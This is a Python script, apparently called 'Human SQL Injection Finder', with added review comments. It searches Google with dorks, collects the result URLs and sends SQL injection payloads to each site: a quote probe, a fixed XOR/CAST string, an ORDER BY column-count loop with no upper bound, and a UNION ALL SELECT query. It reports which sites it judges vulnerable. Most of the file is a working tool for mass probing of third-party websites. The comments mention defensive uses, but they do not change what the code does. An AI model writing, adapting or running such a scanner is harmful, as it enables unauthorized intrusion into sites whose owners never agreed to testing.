import argparse
import requests
import time
import bs4
from bs4 import BeautifulSoup
# Silence urllib3 warnings. Every request in this file is sent with verify=False,
# which would otherwise emit an InsecureRequestWarning per call.
requests.packages.urllib3.disable_warnings()
# Author metadata, kept commented out. Note that uncommenting the `__name__` line
# would rebind the module's __name__ and make the `if __name__ == '__main__'`
# guard at the bottom of the file false.
#__author__ = "Jevil36239"
#__github__ = "github.com/Jevil36239"
#__Finished__ = "12 - Mei - 2023"
#__name__ = "Human SQL Injection Finder"
# Fixed probe string that gass_eksekusi appends verbatim to each candidate URL.
# It never varies between requests, so the literal substring is a stable match
# for WAF/IDS rules and for searches of web-server access logs.
sqli_payload = """)'XOR(ifnull(CAST(MID((IFNULL(CAST(schema_name%20AS%20CHAR),0x20)),1,62) AS BINARY),0x20)=0)OR('"""
def print_banner():
    """Write the tool's ASCII-art banner to stdout."""
    # Raw string: the backslashes in the art are literal characters.
    banner = r"""
_______ _______ _______
( ____ \|\ /|( ____ \( ____ \
| ( \/| ) ( || ( \/| ( \/
| | | | | || (__ | |
| | ____ | | | || __) | | ____
| | \_ )| | | || ( | | \_ )
| (___) || (___) || (____/\| (___) |/\
(_______)(_______)(_______/(_______)\_/ Human SQL Injection Finder
"""
    print(banner)
def gass_eksekusi(dork, limit):
# Run one search query (`dork`) against Google, collect the links on the result
# page, and probe each link with SQL-injection test strings, printing a verdict
# per link.
#
#   dork  -- search query text; placed into the search URL by this code without
#            any URL-encoding.
#   limit -- when > 0, only the first `limit` collected links are probed;
#            0 (the CLI default) probes all of them.
#   Returns nothing; every result is written to stdout.
#
# NOTE(review): this listing has lost its indentation, so statement nesting
# cannot be read from the page. Comments below that depend on nesting are hedged.
#
# Requests generated for each probed link (useful for WAF/IDS rules and log review):
#   <link>'                                  single-quote probe
#   <link> followed by sqli_payload          fixed probe string defined at module level
#   <link>' ORDER BY <n>--+                  n = 1, 2, 3, ...
#   <link>'+UNION+ALL+SELECT+1,2,...--+-     sent once after the ORDER BY loop
# Each request carries one of the three fixed User-Agent strings below, is sent
# with certificate verification disabled (verify=False), and sets no timeout.
user_agents = [
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3',
'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0',
]
# Substrings treated as evidence of a database error: generic error phrasing
# ("on line", "at line", "at row") plus names of PHP's legacy mysql_* functions.
# The list is used twice: to drop collected links that contain any of these
# substrings, and to scan the probe response text.
keywords = [
"on line",
"at line",
"at row",
"mysql_fetch_array",
"mysql_result",
"mysql_num_rows",
"mysql_fetch_row",
"mysql_fetch_assoc",
"mysql_fetch_object",
"mysql_list_processes",
"mysql_list_dbs",
"mysql_list_tables",
"mysql_stats",
"mysql_num_fields",
"mysql_field_flags",
"mysql_field_len",
"mysql_field_type",
"mysql_field_name",
"mysql_unbuffered_query",
"mysql_query",
"mysql_pconnect",
"mysql_connect",
"mysql_select_db"
]
hasil_link = []
headers = {'User-Agent': user_agents[0]}
# The search page is requested over plain HTTP from google.co.in, always with
# the first User-Agent; `dork` is interpolated as given.
gangle_sarching = f"http://www.google.co.in/search?q={dork}"
hasil_results = requests.get(gangle_sarching, headers=headers, verify=False)
if hasil_results.status_code == 200:
soup = BeautifulSoup(hasil_results.text, 'html.parser')
a_tags = soup.findAll('a')
# Keep every href that contains 'http' and none of the keyword substrings.
# NOTE(review): presumably this also admits the search engine's own absolute
# links, not only result pages -- confirm against a real response.
for a in a_tags:
try:
link = a['href']
if 'http' in link and not any(keyword in link for keyword in keywords):
hasil_link.append(link)
except KeyError:
# <a> tags without an href attribute are ignored.
pass
if limit > 0:
hasil_link = hasil_link[:limit]
print(f'\nFound {len(hasil_link)} | "{dork}"\n')
for i, link in enumerate(hasil_link):
# Rotate through the three User-Agent strings by link index.
headers = {'User-Agent': user_agents[i % 3]}
# Both probes are appended to the end of the whole URL string.
sqli_check_normal = link + "'"
sqli_check_inject = link + sqli_payload
try:
http_normal = requests.get(sqli_check_normal, headers=headers, verify=False)
http_inject = requests.get(sqli_check_inject, headers=headers, verify=False)
# Skip this link when the payload request returned status >= 400, or when
# the quote-probe response body is not longer than the payload response body.
if http_inject.status_code >= 400 or len(http_normal.content) <= len(http_inject.content):
continue
soup = BeautifulSoup(http_inject.text, 'html.parser')
# The verdict is purely textual: any keyword in the payload response's text
# counts as a hit. Phrases such as "on line" also occur in ordinary page
# text, so a FOUND VULN line is a hint, not a confirmed finding.
if any(keyword in soup.text for keyword in keywords):
print(f"FOUND VULN | {link}")
nomor_coloums = 1
# Column-count probe: n is incremented until a response has status < 400 and
# is shorter than the quote-probe response. There is no upper bound on n, so a
# target that never meets the condition keeps receiving requests.
while True:
payload = f"' ORDER BY {nomor_coloums}--+"
inject_test = link + payload
http_inject = requests.get(inject_test, headers=headers, verify=False)
if http_inject.status_code < 400 and len(http_normal.content) > len(http_inject.content):
break
nomor_coloums += 1
# range(1, n) yields the numbers 1..n-1. The response to this final request is
# assigned but never examined; only the URL is printed.
payload = "'+UNION+ALL+SELECT+" + ','.join([str(i) for i in range(1, nomor_coloums)]) + "--+-"
inject_test = link + payload
http_inject = requests.get(inject_test, headers=headers, verify=False)
print(f"QUERY | {inject_test}\n")
else:
print(f"NOT VULN | {link}")
# Only TLS errors are handled here; other requests exceptions (for example
# ConnectionError) are not caught in this function.
except requests.exceptions.SSLError:
continue
# Two-second pause; presumably once per probed link (nesting is not recoverable
# from this listing).
time.sleep(2)
def main():
    """Print the banner, parse the command line, and run gass_eksekusi per dork.

    Positional arguments are one or more search queries; ``--limit`` caps how
    many collected links are probed per query (0, the default, means no cap).
    """
    print_banner()

    cli = argparse.ArgumentParser(description='Find SQL injection vulnerabilities using Google dorks')
    cli.add_argument('dorks', type=str, nargs='+', help='List of Google dorks to run')
    cli.add_argument(
        '--limit',
        type=int,
        default=0,
        help='Limit on the number of websites to check for each dork (default is to check all)',
    )
    options = cli.parse_args()

    # Queries are processed sequentially, each with the same limit.
    per_query_limit = options.limit
    for query in options.dorks:
        gass_eksekusi(query, per_query_limit)


# Run only when executed as a script, not when imported.
if __name__ == '__main__':
    main()
# example usage: python sql_injection_finder.py "inlink:index.php?id=" "inlink:gallery.php?id=" --limit 5
# payload = f"' UNION ALL SELECT {','.join(['NULL']*nomor_coloums)}#"